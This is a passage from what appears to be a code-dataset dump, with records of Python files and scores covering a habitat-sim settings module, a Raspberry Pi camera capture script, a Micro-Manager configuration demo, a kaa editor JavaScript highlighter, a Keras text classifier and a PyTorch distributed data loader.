ortho_sensor_spec = habitat_sim.CameraSensorSpec()
ortho_sensor_spec.uuid = "ortho_sensor"
ortho_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
ortho_sensor_spec.resolution = [settings["height"], settings["width"]]
ortho_sensor_spec.position = [0, settings["sensor_height"], 0]
ortho_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.ORTHOGRAPHIC
sensor_specs.append(ortho_sensor_spec)
# create agent specifications
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.25)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
# override action space to no-op to test physics
if sim_cfg.enable_physics:
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.0)
)
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg]) | examples/settings.py |
import habitat_sim
import habitat_sim.agent
default_sim_settings = {
# settings shared by example.py and benchmark.py
"max_frames": 1000,
"width": 640,
"height": 480,
"default_agent": 0,
"sensor_height": 1.5,
"color_sensor": True, # RGB sensor (default: ON)
"semantic_sensor": False, # semantic sensor (default: OFF)
"depth_sensor": False, # depth sensor (default: OFF)
"ortho_sensor": False, # Orthographic RGB sensor (default: OFF)
"seed": 1,
"silent": False, # do not print log info (default: OFF)
# settings exclusive to example.py
"save_png": False, # save the pngs to disk (default: OFF)
"print_semantic_scene": False,
"print_semantic_mask_stats": False,
"compute_shortest_path": False,
"compute_action_shortest_path": False,
"scene": "data/scene_datasets/habitat-test-scenes/skokloster-castle.glb",
"test_scene_data_url": "http://dl.fbaipublicfiles.com/habitat/habitat-test-scenes.zip",
"goal_position": [5.047, 0.199, 11.145],
"enable_physics": False,
"enable_gfx_replay_save": False,
"physics_config_file": "./data/default.physics_config.json",
"num_objects": 10,
"test_object_index": 0,
"frustum_culling": True,
}
# build SimulatorConfiguration
def make_cfg(settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
if "frustum_culling" in settings:
sim_cfg.frustum_culling = settings["frustum_culling"]
else:
sim_cfg.frustum_culling = False
if "enable_physics" in settings:
sim_cfg.enable_physics = settings["enable_physics"]
if "physics_config_file" in settings:
sim_cfg.physics_config_file = settings["physics_config_file"]
if not settings["silent"]:
print("sim_cfg.physics_config_file = " + sim_cfg.physics_config_file)
if "scene_light_setup" in settings:
sim_cfg.scene_light_setup = settings["scene_light_setup"]
sim_cfg.gpu_device_id = 0
if not hasattr(sim_cfg, "scene_id"):
raise RuntimeError(
"Error: Please upgrade habitat-sim. SimulatorConfig API version mismatch"
)
sim_cfg.scene_id = settings["scene"]
# define default sensor parameters (see src/esp/Sensor/Sensor.h)
sensor_specs = []
if settings["color_sensor"]:
color_sensor_spec = habitat_sim.CameraSensorSpec()
color_sensor_spec.uuid = "color_sensor"
color_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
color_sensor_spec.resolution = [settings["height"], settings["width"]]
color_sensor_spec.position = [0, settings["sensor_height"], 0]
color_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(color_sensor_spec)
if settings["depth_sensor"]:
depth_sensor_spec = habitat_sim.CameraSensorSpec()
depth_sensor_spec.uuid = "depth_sensor"
depth_sensor_spec.sensor_type = habitat_sim.SensorType.DEPTH
depth_sensor_spec.resolution = [settings["height"], settings["width"]]
depth_sensor_spec.position = [0, settings["sensor_height"], 0]
depth_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(depth_sensor_spec)
if settings["semantic_sensor"]:
semantic_sensor_spec = habitat_sim.CameraSensorSpec()
semantic_sensor_spec.uuid = "semantic_sensor"
semantic_sensor_spec.sensor_type = habitat_sim.SensorType.SEMANTIC
semantic_sensor_spec.resolution = [settings["height"], settings["width"]]
semantic_sensor_spec.position = [0, settings["sensor_height"], 0]
semantic_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(semantic_sensor_spec)
if settings["ortho_sensor"]:
ortho_sensor_spec = habitat_sim.CameraSensorSpec()
ortho_sensor_spec.uuid = "ortho_sensor"
ortho_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
ortho_sensor_spec.resolution = [settings["height"], settings["width"]]
ortho_sensor_spec.position = [0, settings["sensor_height"], 0]
ortho_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.ORTHOGRAPHIC
sensor_specs.append(ortho_sensor_spec)
# create agent specifications
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.25)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
# override action space to no-op to test physics
if sim_cfg.enable_physics:
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.0)
)
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg]) | 0.655557 | 0.330809 |
import os,sys,tty,termios
from datetime import datetime
from rpi.inputs import *
from rpi.camerainfo import *
ESC=27
ENTER=13
SPACE=32
exposure=1
framenumber=1
frame_default=1
digits=4
digits_default=4
quality_default=90
artist=""
artistfile="artist.txt"
# Uncomment to overide red and blue gains
# Calibration gains for Manfrotto Lumie LEDs
#awbg_red=1.6
#awbg_blue=1.4
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
def getch():
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)
return ch
print("Raspberry Pi capture pictures")
print("")
if camera_detected==0:
print("Raspberry Pi camera module not found!")
exit(0)
quality_default=90
quality=inputValue("image quality",1,100,quality_default,"","Value out of range!",True)
print("\nList disk and partitions:")
os.system('lsblk')
print("\nCurrent directory:")
os.system("pwd")
path=input('\nPath to images (current directory: <Enter>): ')
name=input('Project name (default=pic: <Enter>): ')
iso=100
iso_default=100
iso_modes=[100,200,320,400,500,640,800]
iso=inputListValue("ISO",iso_modes,iso_default,"Not a valid ISO value!",False)
print("")
# Exposure unit: µs
exp_min=1
exp_max=330000
exp_default=2000
exposure=inputValue("exposure time",exp_min,exp_max,exp_default,"µs","Exposure is out of range!",True)
# Gain value: 1.0 to 12.0 for the IMX219 sensor on Camera Module V2
print("")
awb_on="n"
default_awb="y"
awb_on=inputYesNo("AWB","AWB mode on",default_awb)
if awb_on=="n":
print("")
awbg_red=inputValue("red gain",1.0,8.0,awbg_red,"","Value out of range!",False)
awbg_blue=inputValue("blue gain",1.0,8.0,awbg_blue,"","Value out of range!",False)
# Digits
min_digits=len(str(framenumber))
max_digits=8
if min_digits>digits_default:
digits_default=min_digits
print("")
digits=inputValue("digits",min_digits,max_digits,digits_default,"","Digits is out of range!",True)
# Start frame
frame_min=1
frame_max=10**digits-1
frame_default=1
framenumber=inputValue("first frame",frame_min,frame_max,frame_default,"","Frame number is out of range!")
# Create a log file
logname=""
if (path!=""):
logname=path+"/"
artistfile=path+"/"+artistfile
if name=="":
name="pic"
logname+=name+".log"
now = datetime.now()
dt_string = now.strftime("%Y.%m.%d-%H:%M:%S")
file=open(logname,"w")
file.write("Log created on "+dt_string+"\n\n")
if (path!=""):
file.write("File path: "+path+"\n\n")
else:
file.write("File path: Not defined\n\n")
try:
f=open(artistfile,"r")
artist=f.readline()
artist=artist.strip()
print("Artist: "+artist)
f.close()
except IOError:
artist=""
# print("No artist.txt file")
print("")
quick_preview=inputYesNo("quick preview","Quick preview mode","y")
if artist!="":
file.write("Artist: "+artist+"\n")
file.write("Capture pictures parameters:\n")
file.write("Resolution: "+str(camera_maxx)+"x"+str(camera_maxy)+"\n")
file.write("Sensor: "+camera_revision+"\n")
file.write("Quality: "+str(quality)+"\n")
file.write("ISO value: "+str(iso)+"\n")
file.write("Exposure: "+str(exposure)+" µs\n")
file.write("AWB mode: ")
if awb_on=="y":
file.write("Enabled\n")
else:
file.write("Disabled\n")
file.write("Red gain: "+str(awbg_red)+"\n")
file.write("Blue gain: "+str(awbg_blue)+"\n")
file.write("Digits: "+str(digits)+"\n")
file.write("Start frame: "+str(framenumber)+"\n")
file.write("First file name: "+name+"_"+str(framenumber).rjust(digits,'0')+".png\n\n")
print("\nStart capturing images: ENTER")
print("Capture image: SPACE")
print("Exit program: ESC\n")
while True:
ch=getch()
if ch==chr(ENTER):
print("Capture mode enabled.")
break
if ch==chr(ESC):
file.close()
sys.exit()
while framenumber<10**digits:
ch=getch()
if ch==chr(SPACE):
fname=name+"_"+str(framenumber).rjust(digits,'0')
print(fname)
framenumber+=1
tmp="raspistill "
if quick_preview=="n":
tmp+="-n "
tmp+="-t 1 "
tmp+="-ISO "+str(iso)+" "
tmp+="-q "
tmp+=str(quality)+" "
tmp+="-ss "+str(exposure)+" "
# tmp+="-ex off "
#tmp+="-bm -drc high "
if awb_on=="n":
tmp+="-awb off -awbg "+str(awbg_red)+","+str(awbg_blue)+" "
if artist!="":
tmp+='-x IFD0.Artist="'+artist+'" '
tmp+='-x IFD0.Copyright="'+artist+'" '
if (path!=""):
tmp+='-o '+path+'/'+fname
else:
tmp+='-o '+fname
tmp=tmp+".png"
os.system(tmp)
file.write(tmp+"\n")
if ch==chr(ESC):
break
file.close() | python/capturepics.py |
import os,sys,tty,termios
from datetime import datetime
from rpi.inputs import *
from rpi.camerainfo import *
ESC=27
ENTER=13
SPACE=32
exposure=1
framenumber=1
frame_default=1
digits=4
digits_default=4
quality_default=90
artist=""
artistfile="artist.txt"
# Uncomment to overide red and blue gains
# Calibration gains for Manfrotto Lumie LEDs
#awbg_red=1.6
#awbg_blue=1.4
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
def getch():
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)
return ch
print("Raspberry Pi capture pictures")
print("")
if camera_detected==0:
print("Raspberry Pi camera module not found!")
exit(0)
quality_default=90
quality=inputValue("image quality",1,100,quality_default,"","Value out of range!",True)
print("\nList disk and partitions:")
os.system('lsblk')
print("\nCurrent directory:")
os.system("pwd")
path=input('\nPath to images (current directory: <Enter>): ')
name=input('Project name (default=pic: <Enter>): ')
iso=100
iso_default=100
iso_modes=[100,200,320,400,500,640,800]
iso=inputListValue("ISO",iso_modes,iso_default,"Not a valid ISO value!",False)
print("")
# Exposure unit: µs
exp_min=1
exp_max=330000
exp_default=2000
exposure=inputValue("exposure time",exp_min,exp_max,exp_default,"µs","Exposure is out of range!",True)
# Gain value: 1.0 to 12.0 for the IMX219 sensor on Camera Module V2
print("")
awb_on="n"
default_awb="y"
awb_on=inputYesNo("AWB","AWB mode on",default_awb)
if awb_on=="n":
print("")
awbg_red=inputValue("red gain",1.0,8.0,awbg_red,"","Value out of range!",False)
awbg_blue=inputValue("blue gain",1.0,8.0,awbg_blue,"","Value out of range!",False)
# Digits
min_digits=len(str(framenumber))
max_digits=8
if min_digits>digits_default:
digits_default=min_digits
print("")
digits=inputValue("digits",min_digits,max_digits,digits_default,"","Digits is out of range!",True)
# Start frame
frame_min=1
frame_max=10**digits-1
frame_default=1
framenumber=inputValue("first frame",frame_min,frame_max,frame_default,"","Frame number is out of range!")
# Create a log file
logname=""
if (path!=""):
logname=path+"/"
artistfile=path+"/"+artistfile
if name=="":
name="pic"
logname+=name+".log"
now = datetime.now()
dt_string = now.strftime("%Y.%m.%d-%H:%M:%S")
file=open(logname,"w")
file.write("Log created on "+dt_string+"\n\n")
if (path!=""):
file.write("File path: "+path+"\n\n")
else:
file.write("File path: Not defined\n\n")
try:
f=open(artistfile,"r")
artist=f.readline()
artist=artist.strip()
print("Artist: "+artist)
f.close()
except IOError:
artist=""
# print("No artist.txt file")
print("")
quick_preview=inputYesNo("quick preview","Quick preview mode","y")
if artist!="":
file.write("Artist: "+artist+"\n")
file.write("Capture pictures parameters:\n")
file.write("Resolution: "+str(camera_maxx)+"x"+str(camera_maxy)+"\n")
file.write("Sensor: "+camera_revision+"\n")
file.write("Quality: "+str(quality)+"\n")
file.write("ISO value: "+str(iso)+"\n")
file.write("Exposure: "+str(exposure)+" µs\n")
file.write("AWB mode: ")
if awb_on=="y":
file.write("Enabled\n")
else:
file.write("Disabled\n")
file.write("Red gain: "+str(awbg_red)+"\n")
file.write("Blue gain: "+str(awbg_blue)+"\n")
file.write("Digits: "+str(digits)+"\n")
file.write("Start frame: "+str(framenumber)+"\n")
file.write("First file name: "+name+"_"+str(framenumber).rjust(digits,'0')+".png\n\n")
print("\nStart capturing images: ENTER")
print("Capture image: SPACE")
print("Exit program: ESC\n")
while True:
ch=getch()
if ch==chr(ENTER):
print("Capture mode enabled.")
break
if ch==chr(ESC):
file.close()
sys.exit()
while framenumber<10**digits:
ch=getch()
if ch==chr(SPACE):
fname=name+"_"+str(framenumber).rjust(digits,'0')
print(fname)
framenumber+=1
tmp="raspistill "
if quick_preview=="n":
tmp+="-n "
tmp+="-t 1 "
tmp+="-ISO "+str(iso)+" "
tmp+="-q "
tmp+=str(quality)+" "
tmp+="-ss "+str(exposure)+" "
# tmp+="-ex off "
#tmp+="-bm -drc high "
if awb_on=="n":
tmp+="-awb off -awbg "+str(awbg_red)+","+str(awbg_blue)+" "
if artist!="":
tmp+='-x IFD0.Artist="'+artist+'" '
tmp+='-x IFD0.Copyright="'+artist+'" '
if (path!=""):
tmp+='-o '+path+'/'+fname
else:
tmp+='-o '+fname
tmp=tmp+".png"
os.system(tmp)
file.write(tmp+"\n")
if ch==chr(ESC):
break
file.close() | 0.07817 | 0.085786 |
import MMCorePy
def cat(config):
"""Concatenate config."""
return '\n'.join(config.getVerbose().split('<br>'))
devlabel = 'Camera'
DEVICE = [devlabel, 'DemoCamera', 'DCam']
# DEVICE = [devlabel, 'OpenCVgrabber', 'OpenCVgrabber']
# DEVICE = [devlabel, "BaumerOptronic", "BaumerOptronic"]
mmc = MMCorePy.CMMCore()
# mmc.enableStderrLog(False)
# mmc.enableDebugLog(False)
mmc.loadDevice(*DEVICE)
mmc.initializeAllDevices()
mmc.setCameraDevice(devlabel)
# GROUP CONTAINS CONFIGS (PRESETS).
# Creates an empty configuration group. Not really needed.
# mmc.defineConfigGroup("groupName")
# Defines a configuration. Without error creates config.
# mmc.defineConfig('groupName', 'configName')
# Defines a single configuration entry. Without error creates config.
mmc.defineConfig('groupName', 'configName', devlabel, 'Exposure', '30')
# mmc.loadSystemConfiguration("MMConfig.cfg")
# INSPECT CONFIGURATION
print('getAvailableConfigGroups', mmc.getAvailableConfigGroups())
if mmc.isGroupDefined('groupName'):
print('getAvailableConfigs', mmc.getAvailableConfigs('groupName'))
print('getConfigGroupState', cat(mmc.getConfigGroupState('groupName')))
if mmc.isConfigDefined('groupName', 'configName'):
print('getConfigState', cat(mmc.getConfigState('groupName', 'configName')))
# CONTROL
print('')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Apply config to group
mmc.setConfig('groupName', 'configName')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Smt weird
# print('getCurrentConfig', mmc.getCurrentConfig('groupName'))
# ***
# mmc.setPixelSizeUm(const char *resolutionID, double pixSize)
# mmc.setPixelSizeUm('resolutionID', 0.1)
# mmc.setPixelSizeConfig(const char *resolutionID)
print('')
print('getAvailablePixelSizeConfigs', mmc.getAvailablePixelSizeConfigs())
print('getPixelSizeUm', mmc.getPixelSizeUm()) # (based on getMagnificationFactor)
# print('getSystemState %s' % '\n'.join(mmc.getSystemState().getVerbose().split('<br>')))
# Property,Core,Initialize,0
mmc.saveSystemConfiguration("MMConfig.cfg") | mm_configuration/mm_config_manual.py | import MMCorePy
def cat(config):
"""Concatenate config."""
return '\n'.join(config.getVerbose().split('<br>'))
devlabel = 'Camera'
DEVICE = [devlabel, 'DemoCamera', 'DCam']
# DEVICE = [devlabel, 'OpenCVgrabber', 'OpenCVgrabber']
# DEVICE = [devlabel, "BaumerOptronic", "BaumerOptronic"]
mmc = MMCorePy.CMMCore()
# mmc.enableStderrLog(False)
# mmc.enableDebugLog(False)
mmc.loadDevice(*DEVICE)
mmc.initializeAllDevices()
mmc.setCameraDevice(devlabel)
# GROUP CONTAINS CONFIGS (PRESETS).
# Creates an empty configuration group. Not really needed.
# mmc.defineConfigGroup("groupName")
# Defines a configuration. Without error creates config.
# mmc.defineConfig('groupName', 'configName')
# Defines a single configuration entry. Without error creates config.
mmc.defineConfig('groupName', 'configName', devlabel, 'Exposure', '30')
# mmc.loadSystemConfiguration("MMConfig.cfg")
# INSPECT CONFIGURATION
print('getAvailableConfigGroups', mmc.getAvailableConfigGroups())
if mmc.isGroupDefined('groupName'):
print('getAvailableConfigs', mmc.getAvailableConfigs('groupName'))
print('getConfigGroupState', cat(mmc.getConfigGroupState('groupName')))
if mmc.isConfigDefined('groupName', 'configName'):
print('getConfigState', cat(mmc.getConfigState('groupName', 'configName')))
# CONTROL
print('')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Apply config to group
mmc.setConfig('groupName', 'configName')
print('getProperty', mmc.getProperty(devlabel, 'Exposure'))
# Smt weird
# print('getCurrentConfig', mmc.getCurrentConfig('groupName'))
# ***
# mmc.setPixelSizeUm(const char *resolutionID, double pixSize)
# mmc.setPixelSizeUm('resolutionID', 0.1)
# mmc.setPixelSizeConfig(const char *resolutionID)
print('')
print('getAvailablePixelSizeConfigs', mmc.getAvailablePixelSizeConfigs())
print('getPixelSizeUm', mmc.getPixelSizeUm()) # (based on getMagnificationFactor)
# print('getSystemState %s' % '\n'.join(mmc.getSystemState().getVerbose().split('<br>')))
# Property,Core,Initialize,0
mmc.saveSystemConfiguration("MMConfig.cfg") | 0.520253 | 0.087175 |
import re
from kaa.filetype.default import defaultmode
from kaa.syntax_highlight import *
JavaScriptThemes = {
'basic': [],
}
KEYWORDS = ["break", "case", "catch", "continue", "debugger", "default",
"delete", "do", "else", "finally", "for", "function", "if", "in",
"instanceof", "new", "return", "switch", "this", "throw", "try",
"typeof", "var", "void", "while", "with", "class", "enum", "export",
"extends", "import", "super", "implements", "interface", "let",
"package", "private", "protected", "public", "static", "yield", ]
class Regex(Span):
RE_ENDOFTERM = re.compile(r'[a-zA-Z0-9.)]')
def _is_regex(self, doc, pos):
comments = (self.tokenizer.tokens.comment1,
self.tokenizer.tokens.comment2)
not_terms = (self.tokenizer.tokens.keyword,)
while pos > 0:
pos -= 1
token = self.tokenizer.get_token_at(doc, pos)
if token.tokenizer is not self.tokenizer:
break
top = token.get_token_begin(doc, pos)
# skip comment token
if token in comments:
pos = top
continue
# check if prev token is keywords
if token in not_terms:
break
s = doc.gettext(top, pos + 1).strip()
# skip white-space
if not s:
pos = top
continue
# check if last token is term or closing parenthesis
m = self.RE_ENDOFTERM.match(s[-1])
if not m:
break
# last token is term(literal, variable, expr, ...)
return False
return True
def on_start(self, doc, match):
pos = match.start()
if self._is_regex(doc, pos):
ret = yield from super().on_start(doc, match)
return ret
else:
# This / is divide operator
yield (pos, pos + 1, self.tokenizer.styleid_default)
return pos + 1, False
return ret
def javascript_tokens():
return (
("comment1", Span('comment', r'/\*', '\*/', escape='\\')),
("comment2", Span('comment', r'//', '$', escape='\\')),
("keyword", Keywords('keyword', KEYWORDS)),
("number", SingleToken('number',
[r'\b[0-9]+(\.[0-9]*)*\b', r'\b\.[0-9]+\b'])),
("regex", Regex('string', r'/', r'/\w*', escape='\\')),
("string1", Span('string', '"', '"', escape='\\')),
("string2", Span('string', "'", "'", escape='\\')),
)
def make_tokenizer():
return Tokenizer(tokens=javascript_tokens())
class JavaScriptMode(defaultmode.DefaultMode):
MODENAME = 'JavaScript'
tokenizer = make_tokenizer()
def init_themes(self):
super().init_themes()
self.themes.append(JavaScriptThemes) | kaa/filetype/javascript/javascriptmode.py | import re
from kaa.filetype.default import defaultmode
from kaa.syntax_highlight import *
JavaScriptThemes = {
'basic': [],
}
KEYWORDS = ["break", "case", "catch", "continue", "debugger", "default",
"delete", "do", "else", "finally", "for", "function", "if", "in",
"instanceof", "new", "return", "switch", "this", "throw", "try",
"typeof", "var", "void", "while", "with", "class", "enum", "export",
"extends", "import", "super", "implements", "interface", "let",
"package", "private", "protected", "public", "static", "yield", ]
class Regex(Span):
RE_ENDOFTERM = re.compile(r'[a-zA-Z0-9.)]')
def _is_regex(self, doc, pos):
comments = (self.tokenizer.tokens.comment1,
self.tokenizer.tokens.comment2)
not_terms = (self.tokenizer.tokens.keyword,)
while pos > 0:
pos -= 1
token = self.tokenizer.get_token_at(doc, pos)
if token.tokenizer is not self.tokenizer:
break
top = token.get_token_begin(doc, pos)
# skip comment token
if token in comments:
pos = top
continue
# check if prev token is keywords
if token in not_terms:
break
s = doc.gettext(top, pos + 1).strip()
# skip white-space
if not s:
pos = top
continue
# check if last token is term or closing parenthesis
m = self.RE_ENDOFTERM.match(s[-1])
if not m:
break
# last token is term(literal, variable, expr, ...)
return False
return True
def on_start(self, doc, match):
pos = match.start()
if self._is_regex(doc, pos):
ret = yield from super().on_start(doc, match)
return ret
else:
# This / is divide operator
yield (pos, pos + 1, self.tokenizer.styleid_default)
return pos + 1, False
return ret
def javascript_tokens():
return (
("comment1", Span('comment', r'/\*', '\*/', escape='\\')),
("comment2", Span('comment', r'//', '$', escape='\\')),
("keyword", Keywords('keyword', KEYWORDS)),
("number", SingleToken('number',
[r'\b[0-9]+(\.[0-9]*)*\b', r'\b\.[0-9]+\b'])),
("regex", Regex('string', r'/', r'/\w*', escape='\\')),
("string1", Span('string', '"', '"', escape='\\')),
("string2", Span('string', "'", "'", escape='\\')),
)
def make_tokenizer():
return Tokenizer(tokens=javascript_tokens())
class JavaScriptMode(defaultmode.DefaultMode):
MODENAME = 'JavaScript'
tokenizer = make_tokenizer()
def init_themes(self):
super().init_themes()
self.themes.append(JavaScriptThemes) | 0.309754 | 0.188473 |
import csv
import keras
import numpy as np
import matplotlib.pyplot as plt
from SerbianStemmer import stem_sentence
def clean_word(word):
word = word.lower()
word = word.replace("š", "sx")
word = word.replace("č", "cx")
word = word.replace("ć", "cy")
word = word.replace("đ", "dx")
word = word.replace("ž", "zx")
return "".join(filter(str.isalnum, word))
def read_dictionary(word_count):
word_list = []
with open("word_dictionary.txt", "r", encoding="utf-8") as file:
for index, line in enumerate(file):
word, count = line.split()
word_list.append(word)
if index + 1>= word_count:
break
word_dictionary = {}
for index, word in enumerate(word_list):
word_dictionary[word] = index
return word_dictionary
def one_hot(story, word_dictionary):
encoded_story = np.zeros(len(word_dictionary), dtype=np.int8)
word_list = list(map(clean_word, story.split()))
word_list = stem_sentence(word_list)
for word in word_list:
if word not in word_dictionary:
continue
index = word_dictionary[word]
encoded_story[index] += 1
return encoded_story
def read_stories():
data = []
labels = []
with open('ispovesti.csv', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
data.append(row[0])
likes = float(row[1])
dislikes = float(row[2])
if likes > dislikes:
labels.append(1)
else:
labels.append(0)
return data, labels
word_dictionary = read_dictionary(5000)
data, labels = read_stories()
encoded_data = np.array([one_hot(x, word_dictionary) for x in data])
labels = np.array(labels)
split = int(encoded_data.shape[0] * 0.85)
train_data = encoded_data[0:split, :]
train_labels = labels[0:split]
test_data = encoded_data[split:, :]
test_labels = labels[split:]
input_size = len(word_dictionary)
model = keras.Sequential()
model.add(keras.layers.InputLayer(input_shape=(input_size,)))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=['accuracy'])
model.summary()
history = model.fit(train_data, train_labels, validation_split=0.1, batch_size=128, epochs=6)
score = model.evaluate(test_data, test_labels)
#print("Test accuracy:", score)
#print(history.history.keys())
komentari = [
"Imam najljepsu mater na svetu.",
"Prevario sam ženu.",
"Prevarila sam dečka.",
"Joj kako ne mogu kada mi u kafanu dođe dijaspora pa se nešta pravi kao da je neko i nešta."
]
test = np.array([one_hot(x, word_dictionary) for x in komentari])
predictions = model.predict(test)
print(predictions)
for prediction in predictions:
if prediction[0]>= 0.5:
print("Ispovijest ima pozitivan sadrzaj")
else:
print("Ispovijest ima negativan sadrzaj") | classification.py | import csv
import keras
import numpy as np
import matplotlib.pyplot as plt
from SerbianStemmer import stem_sentence
def clean_word(word):
word = word.lower()
word = word.replace("š", "sx")
word = word.replace("č", "cx")
word = word.replace("ć", "cy")
word = word.replace("đ", "dx")
word = word.replace("ž", "zx")
return "".join(filter(str.isalnum, word))
def read_dictionary(word_count):
word_list = []
with open("word_dictionary.txt", "r", encoding="utf-8") as file:
for index, line in enumerate(file):
word, count = line.split()
word_list.append(word)
if index + 1>= word_count:
break
word_dictionary = {}
for index, word in enumerate(word_list):
word_dictionary[word] = index
return word_dictionary
def one_hot(story, word_dictionary):
encoded_story = np.zeros(len(word_dictionary), dtype=np.int8)
word_list = list(map(clean_word, story.split()))
word_list = stem_sentence(word_list)
for word in word_list:
if word not in word_dictionary:
continue
index = word_dictionary[word]
encoded_story[index] += 1
return encoded_story
def read_stories():
data = []
labels = []
with open('ispovesti.csv', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
data.append(row[0])
likes = float(row[1])
dislikes = float(row[2])
if likes > dislikes:
labels.append(1)
else:
labels.append(0)
return data, labels
word_dictionary = read_dictionary(5000)
data, labels = read_stories()
encoded_data = np.array([one_hot(x, word_dictionary) for x in data])
labels = np.array(labels)
split = int(encoded_data.shape[0] * 0.85)
train_data = encoded_data[0:split, :]
train_labels = labels[0:split]
test_data = encoded_data[split:, :]
test_labels = labels[split:]
input_size = len(word_dictionary)
model = keras.Sequential()
model.add(keras.layers.InputLayer(input_shape=(input_size,)))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=['accuracy'])
model.summary()
history = model.fit(train_data, train_labels, validation_split=0.1, batch_size=128, epochs=6)
score = model.evaluate(test_data, test_labels)
#print("Test accuracy:", score)
#print(history.history.keys())
komentari = [
"Imam najljepsu mater na svetu.",
"Prevario sam ženu.",
"Prevarila sam dečka.",
"Joj kako ne mogu kada mi u kafanu dođe dijaspora pa se nešta pravi kao da je neko i nešta."
]
test = np.array([one_hot(x, word_dictionary) for x in komentari])
predictions = model.predict(test)
print(predictions)
for prediction in predictions:
if prediction[0]>= 0.5:
print("Ispovijest ima pozitivan sadrzaj")
else:
print("Ispovijest ima negativan sadrzaj") | 0.27338 | 0.323727 |
import sys
from typing import List, Any
import warnings
import random
from itertools import cycle
import torch
from torch.utils.data import IterableDataset
from utils.hdfs_io import hopen, hlist_files
class DistLineReadingDataset(IterableDataset): # pylint: disable=W0223
"""
iterate a set of folders.
"""
def __init__(self,
data_path: str,
rank: int = 0,
world_size: int = 1,
shuffle: bool = False,
repeat: bool = False):
super().__init__()
self.shuffle = shuffle
self.rank = rank
self.world_size = world_size
self.files = hlist_files(data_path.split(','))
self.files = [f for f in self.files if f.find('_SUCCESS') < 0]
self.is_hdfs = data_path.startswith('hdfs')
self.repeat = repeat
print('[DATA]--all dataset containing {} files.'.format(len(self.files)))
if len(self.files) % self.world_size != 0:
print('[DATA]--Whole dataset file num %s cannot split to worldsize %s ' %
(len(self.files), self.world_size))
sys.stdout.flush()
def generate(self):
if self.world_size == 1 or len(self.files) == 1:
cur_dataloader_files = self.files
else:
cur_dataloader_files = split_shard(
self.files, self.rank, self.world_size)
while True:
if self.shuffle:
random.shuffle(cur_dataloader_files)
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
if len(cur_dataloader_files) % worker_info.num_workers != 0:
print('[DATA]--current dataloader %s file num %s cannot split to worker_num %s ' %
(self.rank, len(cur_dataloader_files), worker_info.num_workers))
cur_worker_files = split_shard(
cur_dataloader_files, worker_info.id, worker_info.num_workers)
if worker_info.id == 0:
print("[DataLoader] --> Rank:{} Workers:[{} ~ {}][{}] Size of process file:{} ...".format(
self.rank, 0, worker_info.num_workers - 1, worker_info.id, len(cur_dataloader_files)))
else:
cur_worker_files = cur_dataloader_files
if self.shuffle:
random.shuffle(cur_worker_files)
for filepath in cur_worker_files:
if self.is_hdfs:
with hopen(filepath, 'r') as reader:
for line in reader:
yield line.decode()
continue
with open(filepath, 'r') as reader:
for line in reader:
yield line
if not self.repeat:
break
def __iter__(self):
return self.generate()
def split_shard(data: List[Any], shard_idx: int, shard_size: int):
num = len(data)
if num < shard_size:
raise RuntimeError("num:{} < shard size:{}".format(num, shard_size))
start_idx = (num * shard_idx) // shard_size
end_idx = (num * (shard_idx + 1)) // shard_size
return data[start_idx: end_idx] | dataset/dist_dataset.py |
import sys
from typing import List, Any
import warnings
import random
from itertools import cycle
import torch
from torch.utils.data import IterableDataset
from utils.hdfs_io import hopen, hlist_files
class DistLineReadingDataset(IterableDataset): # pylint: disable=W0223
"""
iterate a set of folders.
"""
def __init__(self,
data_path: str,
